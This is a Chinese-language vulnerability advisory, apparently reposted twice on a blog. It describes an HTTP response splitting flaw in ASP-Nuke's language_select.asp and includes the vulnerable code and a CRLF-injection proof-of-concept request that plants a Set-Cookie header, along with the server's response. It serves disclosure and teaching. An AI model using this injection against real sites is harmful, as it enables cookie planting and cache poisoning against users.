发布日期:2005-06-28
更新日期:2005-06-28
受影响系统:
BUGTRAQ ID: 14063
ASP Nuke是一款开放源码的软件应用,可在Web Server上运行基于社区的站点。
ASPNuke中存在HTTP响应拆分漏洞,成功利用这个漏洞的攻击者可以影响或误导保存、缓存或解释Web内容的方式。
起因是没有正确的过滤用户输入。请看/module/support/language/language_select.asp第31行代码:
<?
...
If steForm("action") = "go" Then
' make sure the required fields are present
If Trim(steForm("LangCode")) = "" Then
sErrorMsg = steGetText("Please select a language from the list
below")
Else
' redirect to the language administration
Response.Redirect "tran_list.asp?langcode=" &
steEncForm("LangCode")
End If
End If
...
?>
在重新定向时,由于没有过滤攻击者可能执行CRLF注入攻击。
<*来源:Alberto Trivero (trivero@jumpy.it)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111989223906484&w=2
*>
测试方法:
以下是HTTP首部示例:
请求:
POST
/module/support/language/language_select.asp?action=go&LangCode=trivero%0d%0
aSet-Cookie%3Asome%3Dvalue HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Host: www.aspnuke.com
Content-Length: 90
Cookie: ASPSESSIONIDSCRDCDAD=NMDFFFJBFMLBNDNFJDFGAGPP;LANGUAGE=US
Connection: Close
响应:
HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Sun, 15 May 2005 11:31:37 GMT
Pragma: no-cache
Location: tran_list.asp?langcode=trivero
Set-Cookie: some=value
Connection: Keep-Alive
Content-Length: 121
Content-Type: text/html
Expires: Sun, 15 May 2005 11:30:38 GMT
Cache-control: no-cache
建议:
厂商补丁:
ASP-Nuke
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.asp-nuke.com/downloads.asp
更新日期:2005-06-28
受影响系统:
ASP-Nuke ASP-Nuke <= 0.80描述:
BUGTRAQ ID: 14063
ASP Nuke是一款开放源码的软件应用,可在Web Server上运行基于社区的站点。
ASPNuke中存在HTTP响应拆分漏洞,成功利用这个漏洞的攻击者可以影响或误导保存、缓存或解释Web内容的方式。
起因是没有正确的过滤用户输入。请看/module/support/language/language_select.asp第31行代码:
<?
...
If steForm("action") = "go" Then
' make sure the required fields are present
If Trim(steForm("LangCode")) = "" Then
sErrorMsg = steGetText("Please select a language from the list
below")
Else
' redirect to the language administration
Response.Redirect "tran_list.asp?langcode=" &
steEncForm("LangCode")
End If
End If
...
?>
在重新定向时,由于没有过滤攻击者可能执行CRLF注入攻击。
<*来源:Alberto Trivero (trivero@jumpy.it)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111989223906484&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
以下是HTTP首部示例:
请求:
POST
/module/support/language/language_select.asp?action=go&LangCode=trivero%0d%0
aSet-Cookie%3Asome%3Dvalue HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Host: www.aspnuke.com
Content-Length: 90
Cookie: ASPSESSIONIDSCRDCDAD=NMDFFFJBFMLBNDNFJDFGAGPP;LANGUAGE=US
Connection: Close
响应:
HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Sun, 15 May 2005 11:31:37 GMT
Pragma: no-cache
Location: tran_list.asp?langcode=trivero
Set-Cookie: some=value
Connection: Keep-Alive
Content-Length: 121
Content-Type: text/html
Expires: Sun, 15 May 2005 11:30:38 GMT
Cache-control: no-cache
建议:
厂商补丁:
ASP-Nuke
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.asp-nuke.com/downloads.asp
说明:
结合我写的文章,好好分析一下吧,也许聪明的你会找到其他漏洞的。
3417
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
